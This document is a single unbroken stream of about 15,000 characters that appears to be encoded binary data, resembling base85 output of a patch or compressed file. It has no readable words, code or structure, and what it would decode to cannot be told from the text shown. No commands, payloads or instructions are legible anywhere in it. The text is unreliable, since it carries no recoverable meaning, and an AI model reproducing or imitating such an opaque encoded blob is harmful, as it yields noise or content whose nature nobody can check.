zcCrd;LmX{i*88tEuCo+cr3O9y`^}<3W?gQ={!WLhaRS!D`TAJtEsUtVhWAqfY*w?M zzi+5-F*hXF)fQNH+OAJkvle+JP1|6z@UAHYlRmvc!Eb-{NEKQdf0Y6X|b{*s&&S}$UFY?TZ1uHJ|cnZ(C*F?&RR`ok_+f{ofIjRXq4QRcS@oKiPuUmck zFmO85>NDNr(?j z>2sEfg4>=LFug2KC3)t>9v8aMVOJbHeR1oq&H)@JjV9FhIjD?rSk{@LC%Vkymvq!~ zZn?eEbSInAEWkTE+#)Qb|0Qzp@u$P)nQ~)VBqJ`x{)LstgPvIK#$n5I$xG$G;-oUT zp1*uwyunnjF-IdfgTk4ol7ExlE*=LEzWy?XD|F5&~9L;xJV%{+A+( zUwR7%rpJDvhow3#87Rm;)HE#0j^R;eRCq&U1oSAwguBLNN`yw0y4GXLWSYBjIP%nUT+v6GiD@M2GNSkS9 zo>?&Uct4o0L1&{POXt6M@`c8XEcS)wZsDNKEMZ=dms@V?(!dZNyU#`vo6!wqRc!I5 zrIUpwrPj*_25ab{aUB{91GtXV6pd7qqw$S7kE+M-JD>B^A3xx<`h&-FzHihdH^!nV zT_AbRw~^OD=Of2)R-cck<4+qWJ4giD10-MK36T*=3gr<&Kgc|Uoaskv;^KSy&sFr3HOAc8N?Dd;GR*Cwn%^pfA7 z{}FjwQS*CwZIPM4H~6k&-yy@0FAEc^yYL_O|9tlM-yP{E2XrIxv|_=Uq8`h~EBQ zPx%!((><}fl|g*fbh3Yirw_~;$3KaFo$Do}oLfmR>rhyqu$_2VHG4UMf3N21XIrqt z#anKa%M?nUOvY!6yD1LBLFn)L&EA`bMpt|%o_$p1_gd5zK`V$Z5|nHkTIkAM+nwPi zBCI?XTQcv{lXk$QL^8M#Iagu%|R!b|Hf!{T$F}@h_h{WL4{srz_ ze8(?(?uRsX*xhb#W5$#ER}0fWn$9@mwQ3tz%UbT!ptbibb3|1ZeGCodJ|je-k9iXp zyj+xLWn>nZKzMdxE3si4T}Hw&K1!P~^IG7Xd_=qS+rcHH+6fAeAcild|>o*AJkHFrL-&P12`+P-ylem&f0)P5<`^uH} z&T6YWW67Ym__Z%DSP)9y@oyKq!o|H`-1E|F6!#q7dQFja5vrrHh0)EaHOdfN z_ZWLR$>IJ6!Cf*heil4{i#5AhlbhhGJDSs$uI7(HB zb9|MTtiz@}K|kzT*Np$lz+>6XpU()xFr}6I_Q}Iv&1Ay+pD8JlNzYKPyj6C7xIFr_ z$wpTZq!&P!(7xXyW!zXUxu#wSVnDr~^k%iNj%b)i@BQi`mdKVe?a|@Iu!F06cWj7E znG)Qh^*uZo^=<1~Ej7kMdksIYIS&nx#(eJC<*H%{n8P3<|9hlgf8$lOn3LqEqtb0b z)p$y8OEcT@+Hr$ta|~belLKb3yBT+%F@=$Ori)KUwn*zkg&<4K{@7X$SwQYs?AM=@ z*O2B1$CV$~N~}!Q(0ld>Sd7YKU%6`Dm{4kD*3G-M%)cx?l4XWrrR@35Z%D*RdXd(1 z`Sz|q|KrOu>;4qp_Imukfj;Dzl*a3uJAZPqe_X0!;E7r6I*@Z=kSiX1v;HH;Tj)dd z=Eje69_+_zS2qG^#pE^>nkg9i^>4r3EHJsX8%Kzq%HHWjT8{An$8zpBnh3SY+X_uK z-F07wAMYES?tA$R%9<`XwC;c3y^Y3$WxXjE@DTMGHEW{P3+!ceA5$^Cz97Bpsbt^i zz6IPedITngsxPpm1a&Zj#mb(cZuJsYe6%@ZH`F7Zr?nI7h-$>eaGfVa5GQhw$Vq*; zO)eEtsDS(PK$AMCdn))QmE`v%EWe7}7G`v;XEhDCE7H=!dX;oK!!dbw0&E_==)aEQ zvGBys=jB{J%l;Q{HQ%_sjzHrZOP$g5qt77r&b|># zYXu!_DI+<^H5)&Nt`c|_$jd*%Q@k$FFUxzgE0EroxPB&JnQZ#ba!^G7Cuiej8?V+; zyLU3EE1@F~F$yuzG0RbRbZbn~CV1#|K6GMgO_${`RdnUNN2hB4t#gxM)5!z3PE207 zDRna6*UHRp{Af0`6yrwY=lm*TF_8$*hdHE9ofugCHtvver8SZrD#MfXilTA%qZcU& zbo^)}VwzX%m=twz?3khqTfJ!lyf}@7857a830u@}NUg+eZ@^(CRo7h}{x;Ia_s7wW z)OI8%*EVElb*?Y+Mt<^3lL%$82f0O9~7W>t^D9>SA&(yV3GR5bCmUR^;`*hodp7 zG<9g!zhI8$pYGZt!1^%a!6o3Ny3H?`ft|)bMHPcVV!dxoqJwauV4ZigZ&mNPDUq|t zXHgk!t%%>_tjCXCF!Mx#0=r@C74Kbk&f~q6r`NO8CE^?|HI^oCBTh=A{Hkus=3was zy}Qq8eSajY~F=q%s?};rY#O8e+#eKW`6t(y z=yQZ`%Tc^PG)ax|&XZgSU}rW{V-9&){k)DwK+j;yoXcgR0d0SwGva+f9&uQpWvMr5 zMtfL{PW)cPLI&{!?FV@+H^;Xm#Fl@5%fve1^NVdn)5%$Aa63}u%VfvWqV^Ru15blY>gPtt=KCW98AjYjLW)6Mp~ z4t}v@990v{6u3P>@4_&9*C`#UBDHTu@02BtmpIA4!rJWSem(r?`w`1-Q@~GssNp^> zz^(TWo0g0g!Pt!WDz--Ih<`a~8xtkXg056?{hp@ey~#>KgH6H?ub1DCPEYl8aF~|+ zjSx%G%{Hb#sVc2FwtMnuz0!(X7Oo4mlZNfH{0h$0@RQeVNRii>I@A|P-;5s8(U@L6 zV~t^2iB~p%-Gt{Z4tbIF^hTQ^5hku9`nU;87uk8^^om#L{5l#oXb zvf3{f?P8|8~oE65wC7PZT(AZHS(_)Vl|}F13peuCtM+s6gzXdk#Y+~1v#4B zj|HKb&PnDj+I8os$#VC@?gH|WrFkA5PK!l>kVAC6pEG_ zCl8hBn$>AlBoeYEsv@28$88ANXnwZHydctGAFgjx&AE?F@%}}>K*0B(jV9CHmkhB! zjk(*JrH`GOMdx3k>9HMEn3vuTGgFpMlf><_w!Zad;S083;&;!N(Y~3~0yWv*9sHhX zK9jhA&t8yz zH$-QXg29ftpRILw2%U+$Bc!WIw1nS7+MApXqfP%)?#`sP&iU;L^zQ!Dxk$g3CU0lO z&XiR3Fn+Cf23a!9>j7>TdKl)?SaR3e2-NR&I;KWPq2hE-%%`lI1U-$2dq#7jq|KWb zxn)wW6Z)i%F0x}_K7~ze`VK-(9-|}3xbmVuo8_8iufB`N&#)!ln09`8!IdCyb21sj z#O51eHu8@eI!aOMwsjwb-EqP6O(3bO$a}Fw?#R-$612Rq*&Cm@5KkD?t#f^ceez?y z?bW}v0Iv;+KFa0JG473tf4*zk%V-y~%I)?zXp=>0Y!QuOLqsf9WebDPu%W%-HwFn$ zyLax7IunK9?FJ!^k`7DO}allmj@wJldz`6 zEHE0a`ZjjWKlkf-Db-(>mY zIBvQR(??;YPkMf>-WA^Hr-Mn=n?-Zp7^mtu{FH%sICwWS8m|%Dpr`CAy! z-a{|nXP-|laGrEaXBt@=wJlt@A($%dw)m3z5}w$}3G&(9TAwR4ciiPy498cRWUriV z#g=gz4v67c`@MUE-$kBi>eF(y%a@`s8@2jQyeo~bcu^>>Jn>|t6%R=^KH}>vbM#LamFMZ@f3c~Su9`?c zJr~0!y`r?RukrED*vQhBVpUNR9z8FzFa2mxwAwC6ZtNTvkLPIKp1#pOnyXjR*+0oW zeiWHHy|yt$w{hxFiQ7BNceL*On0U!SjG8oe_io`D$?~{|(Ba>%>J=_a_3q+vqloge zA^%>bIIY^A#w`tkH}N&oP8B^H=n8Rb2`7KKyY?)24h0@Zt54}8NX>dL9~za7EA4tz zANt+QwzIU8aV)#`tA8!;yVZE=dqsqi@q9e4e(v!}SyAorSW+>Um&cdf`%keWTDKYxjcJT z{&wK>#6h0AZRe$OyXSXXhuUJ2WtG}#omw;cwn`s%i#VRUR`qi^*5+5@#u`f&2~I!Ze!YJ`3@FWTFb`*Qw|z<2O)|=%6m2r7Ed$z9KNO~ zPO~fzC|!KvtUVkxCR7;L$!F-bVW`dd}NjrOF zV=12oigj6~T#d4cn6HY)M!DNQ>tAnQp6owvmq%>sz1!CqX&33dV6wTn5v9zhpOh>R z5!WtY(iD`5*lHP+tzEBZNp5L;xSeU1?PXfzI_rcVLFdm)lG7T-$A=xsz9Bi)tChZ~ zXR{MN>e~}F8ZC3~VaISZ=`?nWw*8TFZ0MrX-Vjl(?v;^VWk*FotFur2)o>juU3KJ0 z&+LoxoXl%w?c+5+s?7$P>&R+RJpaR1~+fr=0zVZv- z7LT|}(a=p=t+Mg;AelcWUn;b}j(7TJTeM!;vYiwJRIg}9u6tnrTwif6IH$Bb(5PY> z;6v1xZIv3)o$$JlGwrAdl#4wWYgeg>8{+@Cdc^A9)a-#6Gm1Les@EVKOW2$1%-`4| zrHv!X)py*-2wSelR9QB$wXU_V>Dj%7md&nH$jY}It zxZ4>=H`?o(z2hTnHevD>H%80mh<0iy{GItjzpb3d=Gg9^J6rSqS@*28Kb+c_xoDf^ zmYRwTxtpjiu0Qj3sKYDqU41g%f5`! z6OX&oYaY{~7E?5B>EiCyAKORcI|aod2yh)TTa1N4Lq*Q`yArJNc+y1u<>AxM!(?ld z-H{&MN>^o@(+)WV7WGxR6*}4zOG8f5G-deZrU!dNn^H&dqt@H!yib$3EuK#I96lxR zUJQEWIo(Mc@%{Vb7a_#0WR4TU#YR0JgM;7UrhokRA#oDvx{B)`dfxVpahUxqBEOR! zlP3M8{cVhDHIDEIAhCrj9*#10C{?ydepCwlqge(P6s(F_jA)%y1fCBgM&3SK$ znvU*Gu39O_h7coTkW3tRq1Ch?$CD?hA45Vi6tk7yZH#^WJCyA@lsIbM_HLmANAaKA zZTa!$n=B44?(?2luIprhAN|@gV6c|C%|{yGrz_n~ikjOQ6|+S1wQ5&Ji|J@1I)Bym z7(Ed>-@b14CubHWMfOZiQZfa~;|&L{0`VDD>fHF8ot^I<1$_Ld)9@a3!f8H4>%i)C zF-luO1#a@wd!i>sn8+VL-Cw1qrdBDV5ODb-PT~Hg%wn9wbbvbP^f42Y!LMXtc#+Nh z^qscIp`=Y+@BZJRAh1R`{w?m{zzqhJJaDgb8Btocl`wz$qornqR`nO$Sj3ztIv1x0 zHOF&7zjIV0=-*_%s$ogqUj%8Z&A6_(m5C zr`X=skRzPJVFr)~!*BoONG1uoS6m#9V+9SWw>oo~4*2p+yA7_*Z?xN6T3QC!(8F2@ zb>C?v1Us0aGVmDIt70=~&b>EkoK)z3<`8zc^(*B%bb)e~T){gR+RVRzr~1=w zL9>2R`-T4rZai{LJF)Qb#Y9IFp+Kob8>}qTsT#ggv*DW$>FMdiXFnw-_I{y%a~lH# z=}03gF8)SEMFQ%);E6Qb#h)mMv-RTj$?7QZ1PCYQdi%vxIzzxX)RsP^rUrp*sN%Mq zkVtrHUvW5Q77!M;ywabxK2aF~-ZVCYGCVsgX<@j;#A;R4SPpRCiOx$8(9zLN1~akz zu_=te%pjiMF|_{jAm8h5-#r*~ntvA7mlD%K+AwhYg$lh?rCc?b)voYM&*Rx!$R}Ya z(qN@)I8NGs*sq6D5_s|zo|T&$0*=qq#Lw2qvtjIT@p6`_doQOu9Inq!xo(x7U%~2W z@kYZ~nXVUdKiw}h#}=(KDvp7>07FtyOG_4T`pOgwA`m+Y;fQg%I2cYS+sX->+sHe# zAuJv>KRk`E{F%YYUbjC0hqpz3V6~v4BtcMZJ$ucn?u2&QZ4c|<@6dcG|E6`!H@aY= zd<+7n8Hg*vWc-n9dDWr8!I+6ob9V%<&h0E~50s=*#*)DK;?hZZ{x!smz=ef{0+)lg z`C;HgNY>fenQ__tt`NC}9X8au`mRp;JT*3jZ01B!pwvag)|LbI>cNkzoE)aQ)4z;e zeY6n)U{-7m8#eBOnA^MqW|?^}fVJ+}n?0O^{?mxRK+3|GWlz>U4p*Mk_&-IY0 zu&^*aJ)P~{%B!yScP!d<-To9F9ZNlNe4dvG2o8qOT@1an9htdOQ7k(x_vNhTTJF%w z#!G-_7bLn2Y-bw0z-%LYd)pdjPE1da^6FyCQ?=HG z3*KY#cxPTATPdWaMHHG`sThusxM&R)?aC7jGU^Qm_!YWT~VXZNS%_BGU2k8dl#elaK2Qt+JPmkueX<$ zi|eae>D&HVS4Wh$Ls?=_8GZux8Y2}pRLE5U3w;T!n;y~A2f$kUfK4GQER4EUcg6yP zuTkUlsd}p}4uab5`CgwZela6lDdOsU59(QhpqP{crpD#q?_$5%MB+gO9t6hE4jW^O z`-!P}3(L#J5Z{xOb2ld{i(3Q~uePo(!?ZmwhK$soKfeY=`Q_(eT4(66J~F$PH3St~ z)~f?FU40PzW`2B2oVz%hHioVAtUvb_xzh|PvM67wk&Bfz3<~mHOWrCnA|pTb%#`yo zS(d^Ny%Rn(tsFDWUB-0Nr<1o!aq#lUO?HJZ~D_s5SPoR$;O z5NvE$em#O@^fKq2D@-Pz$2l+TS;Ap0S7tOcv|tLMME&;A{%S`nWGaK3t$@AMCkW7J z1cv*~kJmJ?Af7`cI$r&jgxrun6tfAyUWtx}CkjTgsi_H}Cb0Y#Z5mnM`zKf3bhL=( z&Ye5w$Ma#xO=mioDPL}>85O2}WjH;Zxe$VwC8VV0=URhM)~9OYpwFNP=DFMG z$z-*oBZ(cjbRnL$qda)Ymq%|~1cXoDIwCD2@T`vTwC@JSgQbhdS zo|YN+B?=yRZqEqEB|%cIKi|dRcib!)O-xGaD;?HSPraHG!i|c&a6b(r8@}81k=5uGuX9{90l@IL;X(nj&3%nTpSz&Mppocu3JMiJ3ZX!x<%pEkf&K)vDeEF zAqv~Z#>T+NsK{)XMM@Vx*=#t^@@zl7KrIIri*zF5K}2UukzrRfyZ+6tDAwhqtMhMN z!xhN))F$1SAJ3IV=yInmA~2j{|-ijlEv`4VD{x*j-rtFy=TU{VN@z6UoTHKlyD zuI}#r@7Vtd`tM!OHp+i!*VipBLyFsl?J=ISJznR|ukC(-kBm+*<4r34xkl}c0&F|qu6Y5MeI3BR zr2G!u8}p%?UVoV)=iDhgj&-$MH@NDqE?u8GZgzuZxHhHi+1}sB4#sCyu~sg-6Z~(- zN3+D_>}&|686U!5WuB)zDPE$J5b;YjJB$M@wQyxv-5B{5#%RR3=kZBcqhMkXR{Q+#> z4HLSoSlpQl3scXREmhV)8HWo&W)oyDR5E0nXZKq*XIwbOn)xk11!2u?|~FSlG)@eMdmOxw&~#(6Y~*yE=qM zP%!ZmmH6%-bt`s2(`serl7Q(Z+K7XLf3{uERX$WrKhP1N1fgBFOsNhg<>o}Ao} zNujLYuVrFl5@6B$&j=U99EnsTdM1<+dsEb$@f1L-zoj^f$J0JqD$=22g zjfML)E+G(ek3W64(g0bk4|W-fPR!OwzFJ5~$ie?Ddz-`D^~0-r*CR`G42)GUSA;ua zu%YOMe2Q8CHUY?>AE%CrSB?)GT0cwx+*SoU!BtBbz9-gXC<`Al#f`wtMgTyMr3%|s znOfm(fEezt^!vbFy@H;L%cJ_M9SFThuPece{WsrEs(uPQdW8BO324CHMUNw9q{^Q0 z)w^kF$1uWjMHLkj`W$E6t`MFn6IJ)KF|+)gCJfelxVUrM(Q~P44i07GlKI6$HxmVq z5=r&z!{{n2f(n5Y17zyi#VSN*?wLj(^N|8Cz`uoXV<@umyp1rncL1wH2#xe!pKbPM z)=#e>+GJ7|cjhC>-we%{PrC^$NDo{M+^#N;prs`O2^(Q|H8nTGuw*Yz{Q#`0vpSFg zkOGzk&coY^h=>sJ@DK$26RE9(d;k7qUE4-`X<8XTgcc<* z>t{OhXYDDh)6$RQws?DD@IWW#&1hd2E-voNeM8YJ$bAOTDHEAQ!fDa~_1w`sR*8n> zdfagjxXp>a$t9J!ea<~r`OjvsO|hJ;LU9A)1K)fsDRywTt3dHtKTGFzMO+W zINz}Hq+(&|Ez$-achaSO*@T3yaaMJmz-1&}zC_yOfPHTW*qX({8v@CZ9m-PF%)_04 zZ$$ty3k8%c5cUh+4lzj6-UnK{M?VZ0_E&+f2qZ8h`LzH0TX()KL{v;nRSCb!1;N4b zxuAf}<7AOAl1209M)~xn%{0=^6KwqGn3<71*iQhg`JX|s`3TUE9b7%1I;?kuKN4~K zS;^!S8^j20&5r;p!su^SZwYn<8a%GTZvj&`WJl7YM~@JvD`}C1O7$M@9%mao&@?Fm zS1jdDp(;K<%BWV zB;Z>YgdsYE_xVG1_WmUTtQUOFyVO_5?LrdL(grZiASeK35Or~RI&;po*;PS+gY)CN zTDc{Rg;~YB)z8Z9fVBe_77UWkte_Viven}5VppUEz&DEk)~q5za&lR~kM5iGkTBd% z7Na7CY$^C1f`_#|Co|ty0rHVe66}F)QS(#Qy4Gm^|6+$_%OO43U@OD<6w{tp0@=#> znUIAQe!TXB8PVmAg8*&_K)mMa@(js3!LJTT{`I1wA|{G?`b}tax73HYOe*LW4Z)io zC<&4d$J?`<<|Dt>>hsjMtTtaMfj22&i8(k)ez!jI2|~#)+wp6TVM5yt*O@db!VSA3Z6@u9D{Ik&cPf8q)jmZ| zIcv@KHIR)mVVWaZ-xPU-e!zUt)EPlHT4_fI%bAvjrZw}uMM6Y1e#lggioHW`O;76} z(H2ZPFkMe%fW3s!u?Olv5k&sE`FSKGhX*NW9H$3s_wn%!P3N~fulQk_=0UgM1a&~1 z+}U?^@SE$GBzNh<`Gdw=6z^Q!zz;PBZUPb;H7vm@`!!o|ks8R?7K+o)tKNJ{z^Y~b z>l&x4BF#2`Q9r(;MH8o<$)3E5g0LdhQ*Z%+va#a3Kcz8JO{Mac1WElxb zn1ATi&tHaJwez<^=well+b(V(FgQ3}IbRD}K5*YJCwWe#%|k#HGcZW+yAT%>>xU2T z`c~d;R4gN38hud)IqFre8dumU&&B?rTr9jVJW`Mp6mUg%ai5?RWYX(op(2Sb#{kO< zop$supatWD$X{m1uV7yVLGDe z(ib>OalLw^Pv1ReRx8ngb%oT2xWl+C#yCxa+AbaDLwKG}ShigBL*QuP0lDT00JOZ@MPOe`W6jK38zFYf)#pZDN2Y@gTicXl#ghLA0DFDWk-VhU8oUfE8q$OrWM8 za+mIb5=d_biw4OQA?e0IxW4|X*2NxJ2;er0pKiSlJ9A=ESE{P2+!y5*psB2BL# zlOq`tGW~XUOQY!N>mzv+q{gC&peYiDoc~V+b&@Qdc0SA!JmzTr3G@HH>1UbkuRulkt13VOtm~O>`~y0V#Hxkh+uC2 z;Tw)q&UC=(61-+zDD)vrLLhZ;>IMP10{DLn-~{9>d};Qi*k5nT_5d?w-(hCk|59I4~u-AkR&@Z4a-C)XtI5<#lrTzN# zYfLNGpI_*aGKDOK=lM?i>S*z|*^4UpT4(lCu4-_Q168aUbP_29w^26{um~wgo!4>W z{vF>`lre@xVy!HA50;-RFv;6L{}S3L@;H$gxG%6^SZE#?8&TRd!m z{d*|jq&EvmXJOKDx)ec9PQG~*?d|@LvWUE>d_6f^>m%UUxFV&mevkX#4?`vtB)D+n_xAaw!XXM!I=LF$e`2vNk9%5pHi!DK>u zN@|P6@pk_AgAyJiH2A99x!Qrd-)ew_)uZV+*_z-uwQ7e6B-4N0uMYwl3ZSOF;rh$3Kzcrf zhtIq@H!6NmJSy$tQk7Bg_hWYS-rimeNXkfx`{YRkFow;VJz0pEhI}3%xPpN~80>0W zpy!D$f9XF*L;#fovx8ueh(ZA>Kpt=O!4{MN2=_j9D4kI`Zvip_(Br)sAM61zUQMz+ z{7`MP$&`;=Vt|!^1f9SvAhY~J$0uYCg_UZv)cs(r#I*Uld>Rv@&qh14RSp0j2G9ll zfO7%9Wv_*evu5OzL)nB#{s1!W?|khf9I6+;py^IXoaMh85&vtuwiWI`=||f)wfuuuW1<&bZMVEdzZljtFj@IgC}M;612OPhd5JRXH52_zspKVL$8z zq^@@i5-}!y*7N=i6xcYtwhJE($H7TrWvaG%P+udV8qgcKKg&YkN96^l24G`=>w0Y6 zAce8BvkMX`qJk1sae2BH!(~PQPz3g*$IjCwz-kcNoL5r(qhULjPdb3*=-%D-Fp6?h zeYjdA3|>xj?S0(>W{vb~!}-erbcr)?QjiKPS0P_((zY8C`U7^o8&q`4#?D#bw(h)HHu&hC{TLJ z^;Pzh*3$0n?lR4ns+dkuDCKMQ07GsEB~lgyA17GJm5}>XGeNic=b<-iqiYXY1CxZi zdnpMblgqnxh-oSyq+$ymKZN5PIu@2tP&vb6W7YmP2!!kaeL)SZ`}h~$a%t9|B2%~d z!|yD`AW-)jeq9RS+`r$N3PUym5 zuuuDPmk=qf0#3VwjlB$~KW>Mk#)#bxDx@w58{l&Po6u;^TWL5E0)7fxAC6UyKr=bv zU?q2nC{L>iJb>u|;)6p*)&o!gDQ*yRegxCX`xF#%pfgHJN!dLRfzu|FiHgEzV49O&>vNL_3D|Hme!9kyEesOB*%qSlsv7bysrmkeI=mKN0k;qT*sckop65kcU!nNpcBKTOkpFKTM&x%?E$~H}EW| z`U+zTwR5Yy<$YbB<`gR+JC%(t$*>%rxZ3uHEUj~yUeMURs1brN`uX!`2|2l=M{573 z>%IpLVT#Idum$6aggB^YOUDq|V29B&F;R1Jaz13oTLZp~%nl$kT3TJ7>8wOP0pc@GNN-q-Ys#{*tdv$IioYz_&XetLji0aY@j+tGfA_=d zLT5Kd6m6v14@V2lLZ@3uyo+SmztJ>B~nK)z~=5;^iL2)^Y%`Kq3~3pIR!8*s>pJnVq1BnWu})}Savj|<}J|L!RT4MPXU_sES0@X8;w z{eO;(0A|U+?pypO=l#QEA)l}-b6L`vpmcqfmQC}if17x`lxN~F9f!p66A3kBx|E23-Zt&+D4!vi|q_ zM+g*y_!#qIQHqo1@Be$lICs#Ed*e|9(Z7S-4Tn0zvmUT5Qh*e}2%<3L5F59Uu2dCqyR_kI8R z=Cv=cxfgSeIpUZ1?;dmJoB(8RFlU4@#A;ByFiS~=eX_P4`w~9_gIpb=La(o zyd!+I0F)6I$I{CAH>F}JCbrc|>g&9=dIX!ANZ}n@@Vc5rxef55F6apeVylY^92v)L z0u`g-d76mm)u=?um<{iroiXF{t*ddH48PPRdE;KiXa!HUMUIoMa-}ca>J{|?1l1)r z$JV`7vK4l_RkZMxpu8enJP5WXXZ*2us95AMdy|9&yFVO0bzg}7JmArTYfes0g<%m& z1M%>`d|TW@ zZ!WPnuec{CKa-Z=|4|&?N*l(XezbP`8ue@ayv-0LHvD=pb1R~zb}bJN50N*0!6?V_ zfcN@~IFUQrV3uHxs^#jJ!)9`_$5@aOGiE+Ec;Alav~O78O@ZK; z{eYS^*(TvD^eBm8s>EI@j_Sl!wOXB9r@5SujyTzH#Jd8j-?>A}XK}==FMYy9b;$m@ z)a~p@QjJBufrW{5`*)Iyl*%kQ>#6+l492L_ z-5Kv$HB;R#Vuuib%#wr$XU_}x{9GM3>p?83k~z1x0D%ww>d=tWhP>;JgC+*91@`}i z65IrKYSOqL@cNl4oY1_x>POU9v#`y75f7L;cjZ;NWr-sH~~c+*Q$T6^v@HGwZGW9X}xS6^uNy&1Mas%S$h>V&>9;YGQ}Oh8&EPT<>?iI$ zxU+iZbhJ#2&59~PrZcuNMfCRVbOXj`v*FRn2Fw0rOP=KQlkX1F^yyglA2EXxZ?L`sdB=aU^*+kKKstQvviE=Y-Ksb!Iu& z`)dLvo{^36^@l^{53G*Q76g2W-QJ>l;>CLsrPhAi_53(S)NWG-LY9GDDwINu>9b`9dxQ}6fq4#d|p&UZKw z(>*v8EO`C#c%OY(p69!foTjetin~9=5AhY)Kl!dLHvP6V@>)!qV4LII=sM%gw`&bg zu60mT->8m4_qx|1e%6q_^4clxYN{+{v{_~P`leH3rrW~uVFm}LhJ81k4-cwnLo=3# zuJ0~AnJ`YQWQdxc@|ww^f42KFF?pLl^v(tJMrF~D<>Wn2^XA+1d0r;Q4IbguB}L~P zEH21&PmU(TxyeK>9GHwOz6D1_DIJ`P%78X}+#8xo{P;qMMAkHXMu!F3uT_IDQrAtp zH$+%qK}q<7!mH6f4hxXq*m-!#U|cS%kwy#Gy@xys%CwtO2|j`RY>Rk!CkNi|Z#rH= zr^Zmp9BjRsie`$sZxDREoan{HZLT$0^GYTlj&1RYQu9|US|z`?X(&?EH27 zx!b@A`UfMlHO;%WBtg*Y#T_jAgT^J?iS{~2Jhyka9Ih*Nynm)zbmFT$V4GYir3N># zaP?Dt&=HMHt5%-?zKp@0Ec^ueY-psQ=_eLV(>))DYM*`;&w!toP2Xy{V`lamrwyAa zLWf^gIF@DzB@%Bd@098u)D$FC_N(To2B-LYb#B%+_In1Tw2ZdipF&q12Tgi4*9~t9 zC!q@$j?WuZ>WRK8Z1qT@l}4`WsdLh;m5UYwI0(R|q9+QoBazvXij6mjG$+y8lo>q^U~zt$TIfx>*D+1-iqu#F?x zWUcMD95zkAO0S!ZYeoLJE)@@E^n#rZS>Mz%ly6dLDBa$l&FG%3ln0+ASRA$1xe!i< zIixaj8^E7Dl5OMo#dL!%7R{EVcu3;i`>vis>6HK?9(2VH51SX^!{nifP6i@$dK$At zuO->r)(R1v(|4axv#=Vs=eAbTzNrS5;pJMy%~rb^ zQX-`&+(9W74rla5bFb|>b)k%@JU+%&#&tI%2M~esi>=SuQy!%)qKF*o`7QK%KDnpr39N+H%h|F1wwL(%$5mQ0eJ` zjQo$(GEEqsBh=4$Yc*8}ZqLbU*;A#QI%=vUk5W>H4haPM^ki8j5?f_X9NFW?LW5%W zV&S6rg^5tkKv2;c{Kd4B#PHV*+(XdnvpMYr(-yS8O1`L@v@QZB^t=D63$FFo2|SK^ zf9QZ$D=Fk{95eRz0w{HByIJpv($k-cURYz=izRSrd`qm|D9vCaZdoWFj&4xjBAxj9 z6?hZ{4_oXW)(U>4)6<@$4@5#u_0rT@?H$14yjj#f(j|E{uyqz`{NpFFa8Q>+fq04G1Dvin6+o0x6rdxn|b^dWmwg8&yy;-vr#SPcTG@O zpjnG{** z9Xb;dkC?h%#vn;Pg4>s$4rI0X%TM8_SI704R`LXzL93IUe-NPQ|GgYgHJEyDeeBlE zjB#@mnceidZ_s_E6E-f^8@qBJ(&yD^UKibHnqT-Rbw?}y=7Vx%>%>MoKb=x1j-&@k zz_+4>^xPqfdPehgeT*@a-s2b9Rzku3IGOS}wf*-h%}>YoX^nXMvLDf~3XJk$;Y_$^dh3W2RgVx@^4rj#zv-J0-?qpGQfUS7-Q z8voDjN*I-BS&Ow%*5MIwf%u?+2IBA^(L>&2<@NqpK)RI|So5rNTX|u(^B`e`8F=u< zouZu9-Cg*BrTJ7XCbRwFhLvQ}pxJjl9}8G^* zROq1J$_>s97gJARB?7{4vv;B+*r~kh&2px9PiIDt1cc|pDSy5iGcebh`a)FddLftC zU}fB$z@ZJXV6>kW^(%(jF-1Z7LgPQCD&(SXBnw;D57t^P}SJAPF2-&OlLO5 zzn5`|LGr3W^YYd{dEHb*!^pUR@N#tPtDPE)r?8yQ^LmRnxo}JDYbs-wO}>g^%d}Z+ zF)Dv=l<#e1^|opDH(J}vlPUSgXm*@wF3%y4z8jMN22bINqJxPuvhp*^v=|9eScy6acS<{$?-z?wj4e@mK+R(S+eDc)ycOlTy8*LP8a)aZW*{uSGA7cVaiAhYBT?|$JNkIP^;yaf{>-U4=^Pvh z+7fEjT<)0^gv2-HHRS9SbKbRvCTZ{9Myd3lS^X#t0 zdXu%JPCUz97cI7i{9Dso{4X$q*>|Hf zS4n!&f*uSjq>l|n7UPmOBq`{O?hMu`7%IbOJ~Rw@vj*eFt@@T=p@`I#{+Th0nagwc zXPMW}&*kCr_YS1jZ?p9>dU)?Vr$Xj>s1r6^$@AkFnoalJs#?wJ@y1?J-YBybeze$5Xmw0w zheKlLE4DxbqVhX2wto)^^703sEEfERP!Iuy?HlQ4*WN~3zfkx z$b3iqrP^escf0a5a;NA&M$VV7yR8HksTTceOn$=2a(ExsbgP-FSL;*S*U^HTbebMR zCC5Wjo2S~{TpZ0q=ZEdx!Sv`!G-RhWoyYgs8T++1>%+XnAwn zM1$shyJnr@g#1_JU2Rd$j=!7u%gGuy<5~E_U1kBpNTy*_yvknh>DkMv6V^-u1D;lD zzNT|NwlagdpAfw#Hs76eJl2{64FoG=@|^kN?}ZNIKIz}I?zb6Xw7TVe&6TdavbS+z zjGcay6kqYP8Xj>;k*6`J`-}yb5822Wu1L*zUo1z zz5rP$C-d~Z;lQya^DiBHUjw%yAR5Hu^L7UuG`!Vt2Amz1=(5LmyYESV7yNG1|PUkUU zH`O$s%gKFLpY)Ox;^VJl3%gy6*bPO+1lFqPmvK-LlF#04TaqTKJSV5;Y!CCvYJ=vd z0dS@&lK#>C%=Q-LT-)I;KF-}o`A?lhMh+pgk00y4z~JA5s6I>DI*?{?j9qFz)808j zK?y{+C3#CoZHkovuw@pf=q@38n1m#ZIeST=>|5 z@96T#zoM>W{IfB5VueezOpzi7UTP{b*B7R+&^s}cK6p)G=a$t$cQmWi6$;UYBBb(M zo|ZqRNmxB*bpKF!B4~?7bIH&X{Gn?1$#im_)|bEtJ$H>s>K%ob@Y(bOio8*Eg2R$? zx5Vz=?@`VUZYCMwj}K9Cj0Pv_qB2@FFq<7~xAD=%)!;8%wv8X=y?i5YXs0%ExIdC5 zQ$lIGFQ_@m|sFkr5;8`>?uCJi?%-3AFChC!Ft2 zTq*war`7pP(=jUyzc8RqS{`?RkaI(`1Ee#v68ev6&QJ*VxAWJ# z+g*g>#o*=}AYro^5fSyQ9~lzm|2*(d3S8G4a1$%^j`@)T6W){Eom*HViUbN3)Pje+ijI6FJU*2&dvpdpKrwS z-6G2K==~SD3igxohHQ_|f9uJ8Fh0Q76O5e&m#S8iBz2zgf#>k$4Q8T?>fBsknqBcL z0A~7kYO8PnrHw=TJo>_ge{bPq-Q4t=!&C73AlOZHjpUiNz^7}biNp`2J5*6=@#+#> z|8>AoV8CTlUA3{B(<=Nlt?9Ve?pO(3(wba!Q2#m$N46=hFW}2%119PY>M)vEioP7n 